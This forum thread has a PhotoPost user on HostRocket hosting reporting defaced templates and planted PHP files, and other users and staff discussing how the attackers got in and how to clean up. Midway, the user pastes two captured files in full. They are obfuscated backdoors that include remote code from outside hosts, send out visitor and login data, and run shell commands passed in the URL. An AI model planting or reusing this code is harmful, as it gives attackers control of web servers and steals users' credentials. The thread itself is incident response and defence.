PhotoPost 5.2 - I got hacked - how do I prevent this?
 

I am running PhotoPost 5.2 on HostRocket. Yesterday someone changed 3 templates: login.tmpl, searchbox.tmpl, showgallery.tmpl. A link to another website was added to each of these templates (they broke the showgallery template so the site was not working). I re-uploaded all the templates and everything was fine.

I checked the folder permissions settings on HostRocket and the templates folder is 755.

How were these hackers able to change these files?

Check your data directories
 

Hi Pauline,
This happened to me also, in fact just recently. Pretty scary. It's not the fault of Photopost. If anyone's, I would question HostRocket's security but I don't know enough about it to say anything. One thing I did do is notify HostRocket and then once I secured some of the hacker's files, sent them to HostRocket. One of the major places I was hacked was in the DATA directories. You might want to check and see if you have any unusual *.php files in there. There shouldn't be any.

The hackers have a way of running a decoder to decode your password. What was the link that was added?

I was advised to change passwords immediately. I'd suggest you do the same.

Good Luck
DonnaM
-------------------------------------------------------

There are PHP files all through my data directory! I have over 13000 photos, most in albums - so this is going to be a ton of work to go into each folder and delete the PHP files.

Can someone from PhotoPost give me a second opinion on this? Should all PHP files in the data folders be deleted?

What password did you change - your webhosting password with HostRocket or admin password on PhotoPost? Do you thing they got in through FTP with HostRocket or by logging into the PhotoPost admin section?

----------

These were the sites they linked to (with DOT instead of . so the links don't work):
devDOTytongDOTno/img/shake%20v3%20hacked%20download.jsp" - shake v3 hacked download

wwwDOTmedicalmanpowersolutionsDOTcom/JWIRC%2B1%2B7%2BSERIAL.phtml" - JWIRC 1 7 SERIAL

freesex-storiesDOTcom/free_sex_stories/cd%2Bkey%2Bfor%2Bnfs7.phtml - cd key for nfs7

We had the same problem with Donna's machine; hostrocket server with thousands of PHP scripts located throughout her website (not just PhotoPost directories, in *every* directory on her server).

Change your ftp password - we were able to determine that her files were uploaded 4 months ago using FTP.

All the php files should be removed from the data directory; but you should look throughout your website, because if you have the same issue as Donna's they will be everywhere.

How were they able to change my templates?

I will change my FTP password with HostRocket and start deleting the PHP files (and check for others).

Permissions on my DATA folder are 777 - is that what they should be?

777 is fine.

The files were randomly named; so if they are in a directory with other PHP scripts they may be hard to find. As to how the files were changed; if they had FTP access to your machine, they could change any file.

Hi Pauline,
The reason I had you check the data directories is because that would be the most obvious sighting. Like Michael said, they were all over. Yours are a bit different than mine.

What I would do if I were you is to contact HostRocket, tell them what's happening. They may clean it up for you faster than you can manually.


DonnaM

Just curious, what's the date on the scripts you are finding?

October 15 - yesterday. That was when we saw the new links on the login page and the search box.

This is a good excuse for me to clean up my folders - with each new release I upload the new files, but have not been deleting files not used. I had lots of folders in the UPLOADS folder.

I will work my way thru all the data folders tonight.

----------

I kept some of the files they uploaded:

INCLUDE.PHP
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>


GUEST.PHP
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

guest.php is identical to the ones we found on Donna's server.

yes, and the name on the one is .......
 

the same as the name on mine. I had other ones.

Sounds like the same person who hacked into mine .... coincidentally also with HostRocket.

You also need to go into HostRocket and look for ".htaccess" files. When you find any ".htaccess" files that make reference to the planted php files ... delete them but you may want to save a few and send them off to HostRocket. Please let them know as this is 2 attacks in a short period of time.

What you need to be concerned about is the security of your site. I'm advised to shut down my site and wipe it clean and rebuild with better security.

Good Luck

DonnaM
----------------------------------------------------------------

HostRocket is telling me that the problem is with a vulnerable script - "a security flaw in a script installed on the account is used to add files in the same way that many scripts are designed to legitimately allow users to add/upload files". So, it seems that PhotoPost is blaming HostRocket and HostRocket is blaming PhotoPost.

Were there security problems with earlier versions of PhotoPost (I found some information about hacking PhotoPost on the web)? Could it have happened because I had old PhotoPost files on the server? When I upgraded the last few times, I did not delete the old files that were no longer used (they are gone now).

How should permissions be set on all the PhotoPost folders? I want to go through and check that.

Here is the install instructions with directory and file permissions.

http://www.photopost.com/installphp.html

I can tell you version 5.0 of our script was gone over totally by an independent security company and we recieved seal of approval making sure our script was totally secure. There where in prior version some security holes just like any script. Most of these holes come from vulnerabilities in PHP itself

I find it particularly a strong coincidence that post these accounts are on HOSTROCKET that where hacked. Michael can respond more on this since he was the one whom worked hands on in Donna's account on specifics here.

Thanks - I will check all my permissions (but they are probably correct because you set up this system for me originally :) ). I also run PhotoPost on another site - hosted by CrystalTech - and have not upgraded to 5.2 yet. Will do that today!!

Again, the two factors which point away from PhotoPost are:

1) Files are located throughout site, not just PhotoPost directories
2) Files are owned by FTP and were not uploaded via a script (which would then make them owned by the web server)

Based on those two factors, I don't believe the items came from our script use.

For reference, when I was hacked on HostRocket it was due to a script I had installed. Mine was actually a web hosting package. Do you have any other software installed? I'd check everything.

Also, make sure your passwords are VERY strong. I now have a dedicated server and I get hundreds, if not thousands, of password hack attempts every day. Just the nature of the beast.

Good luck!

HostRocket deleted all the PHP files in the data folder and I checked all the other folders and deleted the PHP files that were put there. I checked all my permissions. Everything seems fine and is working fine.

The only thing I run on this site is PhotoPost. I have a couple of web pages that I upload with FrontPage, but everything else is PhotoPost. (My main site www.slowtrav.com is at a different URL, different webhost. This site is only for our community photos.)

I spent the day making changes to the templates (something I have been putting off for ages).

I don't know how they got into my account, but it seems like it is because of HostRocket. I changed my FTP password.

Thanks everyone for your help!